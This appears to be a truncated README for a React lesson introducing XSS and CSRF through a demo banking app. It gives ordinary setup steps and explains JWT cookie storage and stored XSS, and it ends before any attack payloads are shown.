react-xss-csrf

XSS and CSRF Demo This lesson is an introduction to Cross-Site Scripting (XSS) and Cross-Site Request Forgery (CSRF), using a simple banking application as an example. Preparation Clone the repository and install dependencies: Start the development server npm run dev Open your browser and navigate to https://localhost:5173. Familiarize yourself with the application structure, focusing on the src directory and its components. Get the server code from https://github.com/thinkdaniel/6m-software-m4-node-app-for-devops, install the dependencies with npm install and start it with node index.js. You can change the username and password in authController.js if you prefer. JWT Authentication On login, the backend will return a JWT, and also set a cookie with the token for future authentication. The JWT is used to verify the user's identity and authorize access to protected resources. In this demo, the JWT is stored in localStorage as well as in a cookie. With the JWT in the cookie, the JWT will be sent automatically with each request to the server. Note that it only sends it to the same origin (i.e., the same domain, protocol, and port) as the one that set the cookie. XSS XSS means Cross-Site Scripting, a security vulnerability that allows attackers to inject malicious scripts into web pages viewed by other users. Stored XSS Demo A Stored XSS vulnerability occurs when user input is stored on the server (e.g., in a database) and then displayed to other users without proper…Read More